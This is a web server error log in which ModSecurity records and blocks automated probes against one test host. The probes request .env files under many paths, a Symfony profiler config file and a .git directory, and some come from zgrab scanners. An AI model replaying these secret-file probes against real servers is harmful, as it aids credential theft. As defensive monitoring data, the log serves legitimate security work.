[Wed Aug 20 11:41:47.664286 2025] [:error] [pid 2091524] [client 195.178.110.15:45668] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aKWYW1_S_YJC5elNsBVLLwAAAAE"]
[Wed Aug 20 11:41:47.664449 2025] [:error] [pid 2091524] [client 195.178.110.15:45668] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aKWYW1_S_YJC5elNsBVLLwAAAAE"]
[Wed Aug 20 11:41:47.858714 2025] [:error] [pid 2091527] [client 195.178.110.15:45682] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aKWYW698o4X9wP-pEEH2vgAAAAQ"]
[Wed Aug 20 11:41:47.858951 2025] [:error] [pid 2091527] [client 195.178.110.15:45682] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aKWYW698o4X9wP-pEEH2vgAAAAQ"]
[Wed Aug 20 11:41:47.859116 2025] [:error] [pid 2091527] [client 195.178.110.15:45682] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/dev/.env"] [unique_id "aKWYW698o4X9wP-pEEH2vgAAAAQ"]
[Wed Aug 20 11:41:48.077816 2025] [:error] [pid 2091543] [client 195.178.110.15:45696] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aKWYXGx6NjErO6qWfcMJ5wAAAAU"]
[Wed Aug 20 11:41:48.078050 2025] [:error] [pid 2091543] [client 195.178.110.15:45696] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aKWYXGx6NjErO6qWfcMJ5wAAAAU"]
[Wed Aug 20 11:41:48.078220 2025] [:error] [pid 2091543] [client 195.178.110.15:45696] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aKWYXGx6NjErO6qWfcMJ5wAAAAU"]
[Wed Aug 20 11:41:49.121346 2025] [:error] [pid 2093108] [client 195.178.110.15:45750] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aKWYXX2Gr5YpOjp9DyS0-wAAAAY"]
[Wed Aug 20 11:41:49.121588 2025] [:error] [pid 2093108] [client 195.178.110.15:45750] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aKWYXX2Gr5YpOjp9DyS0-wAAAAY"]
[Wed Aug 20 11:41:49.121744 2025] [:error] [pid 2093108] [client 195.178.110.15:45750] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aKWYXX2Gr5YpOjp9DyS0-wAAAAY"]
[Wed Aug 20 11:41:49.276756 2025] [:error] [pid 2091526] [client 195.178.110.15:45754] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aKWYXZV1zv2LpMhkc3xu6QAAAAM"]
[Wed Aug 20 11:41:49.276998 2025] [:error] [pid 2091526] [client 195.178.110.15:45754] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aKWYXZV1zv2LpMhkc3xu6QAAAAM"]
[Wed Aug 20 11:41:49.277163 2025] [:error] [pid 2091526] [client 195.178.110.15:45754] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aKWYXZV1zv2LpMhkc3xu6QAAAAM"]
[Wed Aug 20 11:41:49.415176 2025] [:error] [pid 2091524] [client 195.178.110.15:45758] [client 195.178.110.15] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aKWYXV_S_YJC5elNsBVLMAAAAAE"]
[Wed Aug 20 11:41:49.415436 2025] [:error] [pid 2091524] [client 195.178.110.15:45758] [client 195.178.110.15] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aKWYXV_S_YJC5elNsBVLMAAAAAE"]
[Wed Aug 20 11:41:49.415657 2025] [:error] [pid 2091524] [client 195.178.110.15:45758] [client 195.178.110.15] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aKWYXV_S_YJC5elNsBVLMAAAAAE"]
[Thu Aug 21 11:26:39.067263 2025] [:error] [pid 2115009] [client 3.140.182.19:52437] [client 3.140.182.19] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aKbmT7tFShAAn9A56aJreAAAAAM"]
[Thu Aug 21 11:26:39.068632 2025] [:error] [pid 2115009] [client 3.140.182.19:52437] [client 3.140.182.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aKbmT7tFShAAn9A56aJreAAAAAM"]
[Thu Aug 21 11:26:39.068830 2025] [:error] [pid 2115009] [client 3.140.182.19:52437] [client 3.140.182.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aKbmT7tFShAAn9A56aJreAAAAAM"]
[Fri Aug 22 09:34:43.678310 2025] [:error] [pid 2142514] [client 205.169.39.43:32824] [client 205.169.39.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aKgdk31lno_-KdKkMwI4RAAAAAY"], referer: http://surf.test.indacotrentino.com/.env
[Fri Aug 22 09:34:43.681196 2025] [:error] [pid 2142514] [client 205.169.39.43:32824] [client 205.169.39.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aKgdk31lno_-KdKkMwI4RAAAAAY"], referer: http://surf.test.indacotrentino.com/.env
[Fri Aug 22 09:34:43.681359 2025] [:error] [pid 2142514] [client 205.169.39.43:32824] [client 205.169.39.43] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aKgdk31lno_-KdKkMwI4RAAAAAY"], referer: http://surf.test.indacotrentino.com/.env
[Tue Aug 26 01:51:03.102559 2025] [:error] [pid 2238773] [client 3.140.182.19:57361] [client 3.140.182.19] ModSecurity: Warning. Matched phrase "zgrab" at REQUEST_HEADERS:User-Agent. [file "/usr/share/modsecurity-crs/rules/REQUEST-913-SCANNER-DETECTION.conf"] [line "55"] [id "913100"] [msg "Found User-Agent associated with security scanner"] [data "Matched Data: zgrab found within REQUEST_HEADERS:User-Agent: mozilla/5.0 zgrab/0.x"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-reputation-scanner"] [tag "OWASP_CRS"] [tag "OWASP_CRS/AUTOMATION/SECURITY_SCANNER"] [tag "WASCTC/WASC-21"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aKz258RiMjgFACCqi-YRtwAAAAU"]
[Tue Aug 26 01:51:03.105638 2025] [:error] [pid 2238773] [client 3.140.182.19:57361] [client 3.140.182.19] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aKz258RiMjgFACCqi-YRtwAAAAU"]
[Tue Aug 26 01:51:03.105806 2025] [:error] [pid 2238773] [client 3.140.182.19:57361] [client 3.140.182.19] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aKz258RiMjgFACCqi-YRtwAAAAU"]
[Tue Aug 26 04:09:46.729367 2025] [:error] [pid 2241551] [client 23.166.88.142:60544] [client 23.166.88.142] ModSecurity: Warning. Matched phrase "config.yml" at ARGS:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "96"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: config.yml found within ARGS:file: app/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aK0XahvYDzkh6AJp8a-pigAAAAI"]
[Tue Aug 26 04:09:46.729815 2025] [:error] [pid 2241551] [client 23.166.88.142:60544] [client 23.166.88.142] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aK0XahvYDzkh6AJp8a-pigAAAAI"]
[Tue Aug 26 04:09:46.729969 2025] [:error] [pid 2241551] [client 23.166.88.142:60544] [client 23.166.88.142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aK0XahvYDzkh6AJp8a-pigAAAAI"]
[Fri Sep 05 21:43:49.405711 2025] [authz_core:error] [pid 2501986] [client 35.203.136.44:53868] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Sep 08 10:11:10.886017 2025] [authz_core:error] [pid 2571308] [client 185.177.72.21:42378] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Mon Sep 08 10:11:11.027184 2025] [:error] [pid 2565335] [client 185.177.72.21:42388] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aL6Pn-j319c0PztAeTg1GAAAAAA"]
[Mon Sep 08 10:11:11.027410 2025] [:error] [pid 2565335] [client 185.177.72.21:42388] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aL6Pn-j319c0PztAeTg1GAAAAAA"]
[Mon Sep 08 10:11:11.027575 2025] [:error] [pid 2565335] [client 185.177.72.21:42388] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aL6Pn-j319c0PztAeTg1GAAAAAA"]
[Mon Sep 08 10:11:11.173888 2025] [:error] [pid 2565337] [client 185.177.72.21:42396] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aL6PnzWkrlJlQye5OlCMmwAAAAI"]
[Mon Sep 08 10:11:11.174156 2025] [:error] [pid 2565337] [client 185.177.72.21:42396] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aL6PnzWkrlJlQye5OlCMmwAAAAI"]
[Mon Sep 08 10:11:11.174388 2025] [:error] [pid 2565337] [client 185.177.72.21:42396] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aL6PnzWkrlJlQye5OlCMmwAAAAI"]
[Mon Sep 08 10:11:11.394305 2025] [:error] [pid 2565378] [client 185.177.72.21:42408] [client 185.177.72.21] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aL6Pn9Gm6MCv3cVeq-TI8gAAAAw"]
[Mon Sep 08 10:11:11.394536 2025] [:error] [pid 2565378] [client 185.177.72.21:42408] [client 185.177.72.21] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aL6Pn9Gm6MCv3cVeq-TI8gAAAAw"]
[Mon Sep 08 10:11:11.394702 2025] [:error] [pid 2565378] [client 185.177.72.21:42408] [client 185.177.72.21] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/config/.env"] [unique_id "aL6Pn9Gm6MCv3cVeq-TI8gAAAAw"]
[Tue Sep 09 14:23:18.012460 2025] [:error] [pid 2595967] [client 176.65.148.43:40986] [client 176.65.148.43] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMAcNuD76U5UaH27zCA-MQAAAA0"]
[Tue Sep 09 14:23:18.012775 2025] [:error] [pid 2595967] [client 176.65.148.43:40986] [client 176.65.148.43] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aMAcNuD76U5UaH27zCA-MQAAAA0"]
